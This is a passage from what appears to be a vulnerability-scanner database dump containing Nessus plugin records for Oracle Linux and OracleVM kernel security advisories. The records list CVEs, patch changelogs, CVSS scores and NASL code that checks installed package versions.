thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-4700\", \"CVE-2015-5707\", \"CVE-2016-10088\", \"CVE-2016-10142\", \"CVE-2016-3140\", \"CVE-2016-3672\", \"CVE-2016-4580\", \"CVE-2016-7425\", \"CVE-2016-8399\", \"CVE-2016-8633\", \"CVE-2016-8645\", \"CVE-2017-2636\", \"CVE-2017-6345\", \"CVE-2017-7187\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3535\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.294.6.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.294.6.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.294.6.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.294.6.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.294.6.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.294.6.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:24:07", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - RHEL: complement upstream workaround for CVE-2016-10142.\n (Quentin Casasnovas) [Orabug: 25765786] (CVE-2016-10142)\n (CVE-2016-10142)\n\n - net: ping: check minimum size on ICMP header length\n (Kees Cook) [Orabug: 25766914] (CVE-2016-8399)\n\n - ipv6: stop sending PTB packets for MTU < 1280 (Hagen\n Paul Pfeifer) [Orabug: 25765786] (CVE-2016-10142)\n\n - sg_write/bsg_write is not fit to be called under\n KERNEL_DS (Al Viro) [Orabug: 25765448] (CVE-2016-10088)\n\n - scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter\n chang) [Orabug: 25752011] (CVE-2017-7187)\n\n - tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander\n Popov) [Orabug: 25696689] (CVE-2017-2636)\n\n - TTY: n_hdlc, fix lockdep false positive (Jiri Slaby)\n [Orabug: 25696689] (CVE-2017-2636)\n\n - drivers/tty/n_hdlc.c: replace kmalloc/memset by kzalloc\n (Fabian Frederick) [Orabug: 25696689] (CVE-2017-2636)\n\n - list: introduce list_first_entry_or_null (Jiri Pirko)\n [Orabug: 25696689] (CVE-2017-2636)\n\n - firewire: net: guard against rx buffer overflows (Stefan\n Richter) [Orabug: 25451538] (CVE-2016-8633)\n\n - x86/mm/32: Enable full randomization on i386 and X86_32\n (Hector Marco-Gisbert) [Orabug: 25463929]\n (CVE-2016-3672)\n\n - x86 get_unmapped_area: Access mmap_legacy_base through\n mm_struct member (Radu Caragea) [Orabug: 25463929]\n (CVE-2016-3672)\n\n - sg_start_req: make sure that there's not too many\n elements in iovec (Al Viro) [Orabug: 25490377]\n (CVE-2015-5707)\n\n - tcp: take care of truncations done by sk_filter (Eric\n Dumazet) [Orabug: 25507232] (CVE-2016-8645)\n\n - rose: limit sk_filter trim to payload (Willem de Bruijn)\n [Orabug: 25507232] (CVE-2016-8645)\n\n - scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer\n (Dan Carpenter) [Orabug: 25507330] (CVE-2016-7425)\n\n - x86: bpf_jit: fix compilation of large bpf programs\n (Alexei Starovoitov) [Orabug: 25507375] (CVE-2015-4700)\n\n - net: fix a kernel infoleak in x25 module (Kangjie Lu)\n [Orabug: 25512417] (CVE-2016-4580)\n\n - USB: digi_acceleport: do sanity checking for the number\n of ports (Oliver Neukum) [Orabug: 25512472]\n (CVE-2016-3140)\n\n - net/llc: avoid BUG_ON in skb_orphan (Eric Dumazet)\n [Orabug: 25682437] (CVE-2017-6345)", "edition": 27, "cvss3": {"score": 8.6, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"}, "published": "2017-04-03T00:00:00", "title": "OracleVM 3.2 : Unbreakable / etc (OVMSA-2017-0058)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8633", "CVE-2016-8399", "CVE-2016-10088", "CVE-2017-2636", "CVE-2016-7425", "CVE-2017-6345", "CVE-2016-3140", "CVE-2017-7187", "CVE-2016-10142", "CVE-2015-5707", "CVE-2016-4580", "CVE-2016-3672", "CVE-2016-8645", "CVE-2015-4700"], "modified": "2017-04-03T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:kernel-uek", "cpe:/o:oracle:vm_server:3.2", "p-cpe:/a:oracle:vm:kernel-uek-firmware"], "id": "ORACLEVM_OVMSA-2017-0058.NASL", "href": "https://www.tenable.com/plugins/nessus/99164", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0058.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99164);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-4700\", \"CVE-2015-5707\", \"CVE-2016-10088\", \"CVE-2016-10142\", \"CVE-2016-3140\", \"CVE-2016-3672\", \"CVE-2016-4580\", \"CVE-2016-7425\", \"CVE-2016-8399\", \"CVE-2016-8633\", \"CVE-2016-8645\", \"CVE-2017-2636\", \"CVE-2017-6345\", \"CVE-2017-7187\");\n script_bugtraq_id(75356);\n\n script_name(english:\"OracleVM 3.2 : Unbreakable / etc (OVMSA-2017-0058)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - RHEL: complement upstream workaround for CVE-2016-10142.\n (Quentin Casasnovas) [Orabug: 25765786] (CVE-2016-10142)\n (CVE-2016-10142)\n\n - net: ping: check minimum size on ICMP header length\n (Kees Cook) [Orabug: 25766914] (CVE-2016-8399)\n\n - ipv6: stop sending PTB packets for MTU < 1280 (Hagen\n Paul Pfeifer) [Orabug: 25765786] (CVE-2016-10142)\n\n - sg_write/bsg_write is not fit to be called under\n KERNEL_DS (Al Viro) [Orabug: 25765448] (CVE-2016-10088)\n\n - scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter\n chang) [Orabug: 25752011] (CVE-2017-7187)\n\n - tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander\n Popov) [Orabug: 25696689] (CVE-2017-2636)\n\n - TTY: n_hdlc, fix lockdep false positive (Jiri Slaby)\n [Orabug: 25696689] (CVE-2017-2636)\n\n - drivers/tty/n_hdlc.c: replace kmalloc/memset by kzalloc\n (Fabian Frederick) [Orabug: 25696689] (CVE-2017-2636)\n\n - list: introduce list_first_entry_or_null (Jiri Pirko)\n [Orabug: 25696689] (CVE-2017-2636)\n\n - firewire: net: guard against rx buffer overflows (Stefan\n Richter) [Orabug: 25451538] (CVE-2016-8633)\n\n - x86/mm/32: Enable full randomization on i386 and X86_32\n (Hector Marco-Gisbert) [Orabug: 25463929]\n (CVE-2016-3672)\n\n - x86 get_unmapped_area: Access mmap_legacy_base through\n mm_struct member (Radu Caragea) [Orabug: 25463929]\n (CVE-2016-3672)\n\n - sg_start_req: make sure that there's not too many\n elements in iovec (Al Viro) [Orabug: 25490377]\n (CVE-2015-5707)\n\n - tcp: take care of truncations done by sk_filter (Eric\n Dumazet) [Orabug: 25507232] (CVE-2016-8645)\n\n - rose: limit sk_filter trim to payload (Willem de Bruijn)\n [Orabug: 25507232] (CVE-2016-8645)\n\n - scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer\n (Dan Carpenter) [Orabug: 25507330] (CVE-2016-7425)\n\n - x86: bpf_jit: fix compilation of large bpf programs\n (Alexei Starovoitov) [Orabug: 25507375] (CVE-2015-4700)\n\n - net: fix a kernel infoleak in x25 module (Kangjie Lu)\n [Orabug: 25512417] (CVE-2016-4580)\n\n - USB: digi_acceleport: do sanity checking for the number\n of ports (Oliver Neukum) [Orabug: 25512472]\n (CVE-2016-3140)\n\n - net/llc: avoid BUG_ON in skb_orphan (Eric Dumazet)\n [Orabug: 25682437] (CVE-2017-6345)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-April/000676.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?243735fd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.2\", reference:\"kernel-uek-2.6.39-400.294.6.el5uek\")) flag++;\nif (rpm_check(release:\"OVS3.2\", reference:\"kernel-uek-firmware-2.6.39-400.294.6.el5uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:24:07", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Revert 'x86/mm: Expand the exception table logic to\n allow new handling options' (Brian Maly) [Orabug:\n 25790387] (CVE-2016-9644)\n\n - Revert 'fix minor infoleak in get_user_ex' (Brian Maly)\n [Orabug: 25790387] (CVE-2016-9644)\n\n - x86/mm: Expand the exception table logic to allow new\n handling options (Tony Luck) [Orabug: 25790387]\n (CVE-2016-9644)\n\n - rebuild bumping release\n\n - net: ping: check minimum size on ICMP header length\n (Kees Cook) [Orabug: 25766898] (CVE-2016-8399)\n (CVE-2016-8399)\n\n - sg_write/bsg_write is not fit to be called under\n KERNEL_DS (Al Viro) [Orabug: 25765436] (CVE-2016-10088)\n\n - scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter\n chang) [Orabug: 25751984] (CVE-2017-7187)\n\n - tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander\n Popov) [Orabug: 25696677] (CVE-2017-2636)\n\n - TTY: n_hdlc, fix lockdep false positive (Jiri Slaby)\n [Orabug: 25696677] (CVE-2017-2636)\n\n - If Slot Status indicates changes in both Data Link Layer\n Status and Presence Detect, prioritize the Link status\n change. (Jack Vogel) \n\n - PCI: pciehp: Leave power indicator on when enabling\n already-enabled slot (Ashok Raj) [Orabug: 25353783]\n\n - firewire: net: guard against rx buffer overflows (Stefan\n Richter) [Orabug: 25451520] (CVE-2016-8633)\n\n - usbnet: cleanup after bind in probe (Oliver Neukum)\n [Orabug: 25463898] (CVE-2016-3951)\n\n - cdc_ncm: do not call usbnet_link_change from\n cdc_ncm_bind (Bjø rn Mork) [Orabug: 25463898]\n (CVE-2016-3951)\n\n - cdc_ncm: Add support for moving NDP to end of NCM frame\n (Enrico Mioso) [Orabug: 25463898] (CVE-2016-3951)\n\n - x86/mm/32: Enable full randomization on i386 and X86_32\n (Hector Marco-Gisbert) [Orabug: 25463918]\n (CVE-2016-3672)\n\n - kvm: fix page struct leak in handle_vmon (Paolo Bonzini)\n [Orabug: 25507133] (CVE-2017-2596)\n\n - crypto: mcryptd - Check mcryptd algorithm compatibility\n (tim) [Orabug: 25507153] (CVE-2016-10147)\n\n - kvm: nVMX: Allow L1 to intercept software exceptions\n (#BP and #OF) (Jim Mattson) [Orabug: 25507188]\n (CVE-2016-9588)\n\n - KVM: x86: drop error recovery in em_jmp_far and\n em_ret_far (Radim Krč má ř ) [Orabug:\n 25507213] (CVE-2016-9756)\n\n - tcp: take care of truncations done by sk_filter (Eric\n Dumazet) [Orabug: 25507226] (CVE-2016-8645)\n\n - rose: limit sk_filter trim to payload (Willem de Bruijn)\n [Orabug: 25507226] (CVE-2016-8645)\n\n - tipc: check minimum bearer MTU (Michal Kubeč ek)\n [Orabug: 25507239] (CVE-2016-8632) (CVE-2016-8632)\n\n - fix minor infoleak in get_user_ex (Al Viro) [Orabug:\n 25507269] (CVE-2016-9178)\n\n - scsi: arcmsr: Simplify user_len checking (Borislav\n Petkov) [Orabug: 25507319] (CVE-2016-7425)\n\n - scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer\n (Dan Carpenter) [Orabug: 25507319] (CVE-2016-7425)\n\n - tmpfs: clear S_ISGID when setting posix ACLs (Gu Zheng)\n [Orabug: 25507341] (CVE-2016-7097) (CVE-2016-7097)\n\n - posix_acl: Clear SGID bit when setting file permissions\n (Jan Kara) [Orabug: 25507341] (CVE-2016-7097)\n (CVE-2016-7097)\n\n - ext2: convert to mbcache2 (Jan Kara) [Orabug: 25512366]\n (CVE-2015-8952)\n\n - ext4: convert to mbcache2 (Jan Kara) [Orabug: 25512366]\n (CVE-2015-8952)\n\n - mbcache2: reimplement mbcache (Jan Kara) [Orabug:\n 25512366] (CVE-2015-8952)\n\n - USB: digi_acceleport: do sanity checking for the number\n of ports (Oliver Neukum) [Orabug: 25512466]\n (CVE-2016-3140)\n\n - net/llc: avoid BUG_ON in skb_orphan (Eric Dumazet)\n [Orabug: 25682419] (CVE-2017-6345)\n\n - net/mlx4_core: Disallow creation of RAW QPs on a VF (Eli\n Cohen) \n\n - ipv4: keep skb->dst around in presence of IP options\n (Eric Dumazet) [Orabug: 25698300] (CVE-2017-5970)\n\n - perf/core: Fix concurrent sys_perf_event_open vs.\n 'move_group' race (Peter Zijlstra) [Orabug: 25698751]\n (CVE-2017-6001)\n\n - ip6_gre: fix ip6gre_err invalid reads (Eric Dumazet)\n [Orabug: 25699015] (CVE-2017-5897)\n\n - mpt3sas: Don't spam logs if logging level is 0 (Johannes\n Thumshirn) \n\n - xen-netfront: cast grant table reference first to type\n int (Dongli Zhang)\n\n - xen-netfront: do not cast grant table reference to\n signed short (Dongli Zhang)", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-04-03T00:00:00", "title": "OracleVM 3.4 : Unbreakable / etc (OVMSA-2017-0056)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7097", "CVE-2016-8633", "CVE-2016-8399", "CVE-2016-10088", "CVE-2017-6001", "CVE-2017-5970", "CVE-2015-8952", "CVE-2017-2636", "CVE-2016-8632", "CVE-2016-9178", "CVE-2016-7425", "CVE-2016-3951", "CVE-2016-10147", "CVE-2016-9756", "CVE-2017-6345", "CVE-2017-2596", "CVE-2016-9588", "CVE-2016-3140", "CVE-2017-7187", "CVE-2016-9644", "CVE-2016-3672", "CVE-2016-8645", "CVE-2017-5897"], "modified": "2017-04-03T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware"], "id": "ORACLEVM_OVMSA-2017-0056.NASL", "href": "https://www.tenable.com/plugins/nessus/99162", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0056.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99162);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-8952\", \"CVE-2016-10088\", \"CVE-2016-10147\", \"CVE-2016-3140\", \"CVE-2016-3672\", \"CVE-2016-3951\", \"CVE-2016-7097\", \"CVE-2016-7425\", \"CVE-2016-8399\", \"CVE-2016-8632\", \"CVE-2016-8633\", \"CVE-2016-8645\", \"CVE-2016-9178\", \"CVE-2016-9588\", \"CVE-2016-9644\", \"CVE-2016-9756\", \"CVE-2017-2596\", \"CVE-2017-2636\", \"CVE-2017-5897\", \"CVE-2017-5970\", \"CVE-2017-6001\", \"CVE-2017-6345\", \"CVE-2017-7187\");\n\n script_name(english:\"OracleVM 3.4 : Unbreakable / etc (OVMSA-2017-0056)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Revert 'x86/mm: Expand the exception table logic to\n allow new handling options' (Brian Maly) [Orabug:\n 25790387] (CVE-2016-9644)\n\n - Revert 'fix minor infoleak in get_user_ex' (Brian Maly)\n [Orabug: 25790387] (CVE-2016-9644)\n\n - x86/mm: Expand the exception table logic to allow new\n handling options (Tony Luck) [Orabug: 25790387]\n (CVE-2016-9644)\n\n - rebuild bumping release\n\n - net: ping: check minimum size on ICMP header length\n (Kees Cook) [Orabug: 25766898] (CVE-2016-8399)\n (CVE-2016-8399)\n\n - sg_write/bsg_write is not fit to be called under\n KERNEL_DS (Al Viro) [Orabug: 25765436] (CVE-2016-10088)\n\n - scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter\n chang) [Orabug: 25751984] (CVE-2017-7187)\n\n - tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander\n Popov) [Orabug: 25696677] (CVE-2017-2636)\n\n - TTY: n_hdlc, fix lockdep false positive (Jiri Slaby)\n [Orabug: 25696677] (CVE-2017-2636)\n\n - If Slot Status indicates changes in both Data Link Layer\n Status and Presence Detect, prioritize the Link status\n change. (Jack Vogel) \n\n - PCI: pciehp: Leave power indicator on when enabling\n already-enabled slot (Ashok Raj) [Orabug: 25353783]\n\n - firewire: net: guard against rx buffer overflows (Stefan\n Richter) [Orabug: 25451520] (CVE-2016-8633)\n\n - usbnet: cleanup after bind in probe (Oliver Neukum)\n [Orabug: 25463898] (CVE-2016-3951)\n\n - cdc_ncm: do not call usbnet_link_change from\n cdc_ncm_bind (Bjø rn Mork) [Orabug: 25463898]\n (CVE-2016-3951)\n\n - cdc_ncm: Add support for moving NDP to end of NCM frame\n (Enrico Mioso) [Orabug: 25463898] (CVE-2016-3951)\n\n - x86/mm/32: Enable full randomization on i386 and X86_32\n (Hector Marco-Gisbert) [Orabug: 25463918]\n (CVE-2016-3672)\n\n - kvm: fix page struct leak in handle_vmon (Paolo Bonzini)\n [Orabug: 25507133] (CVE-2017-2596)\n\n - crypto: mcryptd - Check mcryptd algorithm compatibility\n (tim) [Orabug: 25507153] (CVE-2016-10147)\n\n - kvm: nVMX: Allow L1 to intercept software exceptions\n (#BP and #OF) (Jim Mattson) [Orabug: 25507188]\n (CVE-2016-9588)\n\n - KVM: x86: drop error recovery in em_jmp_far and\n em_ret_far (Radim Krč má ř ) [Orabug:\n 25507213] (CVE-2016-9756)\n\n - tcp: take care of truncations done by sk_filter (Eric\n Dumazet) [Orabug: 25507226] (CVE-2016-8645)\n\n - rose: limit sk_filter trim to payload (Willem de Bruijn)\n [Orabug: 25507226] (CVE-2016-8645)\n\n - tipc: check minimum bearer MTU (Michal Kubeč ek)\n [Orabug: 25507239] (CVE-2016-8632) (CVE-2016-8632)\n\n - fix minor infoleak in get_user_ex (Al Viro) [Orabug:\n 25507269] (CVE-2016-9178)\n\n - scsi: arcmsr: Simplify user_len checking (Borislav\n Petkov) [Orabug: 25507319] (CVE-2016-7425)\n\n - scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer\n (Dan Carpenter) [Orabug: 25507319] (CVE-2016-7425)\n\n - tmpfs: clear S_ISGID when setting posix ACLs (Gu Zheng)\n [Orabug: 25507341] (CVE-2016-7097) (CVE-2016-7097)\n\n - posix_acl: Clear SGID bit when setting file permissions\n (Jan Kara) [Orabug: 25507341] (CVE-2016-7097)\n (CVE-2016-7097)\n\n - ext2: convert to mbcache2 (Jan Kara) [Orabug: 25512366]\n (CVE-2015-8952)\n\n - ext4: convert to mbcache2 (Jan Kara) [Orabug: 25512366]\n (CVE-2015-8952)\n\n - mbcache2: reimplement mbcache (Jan Kara) [Orabug:\n 25512366] (CVE-2015-8952)\n\n - USB: digi_acceleport: do sanity checking for the number\n of ports (Oliver Neukum) [Orabug: 25512466]\n (CVE-2016-3140)\n\n - net/llc: avoid BUG_ON in skb_orphan (Eric Dumazet)\n [Orabug: 25682419] (CVE-2017-6345)\n\n - net/mlx4_core: Disallow creation of RAW QPs on a VF (Eli\n Cohen) \n\n - ipv4: keep skb->dst around in presence of IP options\n (Eric Dumazet) [Orabug: 25698300] (CVE-2017-5970)\n\n - perf/core: Fix concurrent sys_perf_event_open vs.\n 'move_group' race (Peter Zijlstra) [Orabug: 25698751]\n (CVE-2017-6001)\n\n - ip6_gre: fix ip6gre_err invalid reads (Eric Dumazet)\n [Orabug: 25699015] (CVE-2017-5897)\n\n - mpt3sas: Don't spam logs if logging level is 0 (Johannes\n Thumshirn) \n\n - xen-netfront: cast grant table reference first to type\n int (Dongli Zhang)\n\n - xen-netfront: do not cast grant table reference to\n signed short (Dongli Zhang)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-April/000674.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?32b057e2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu 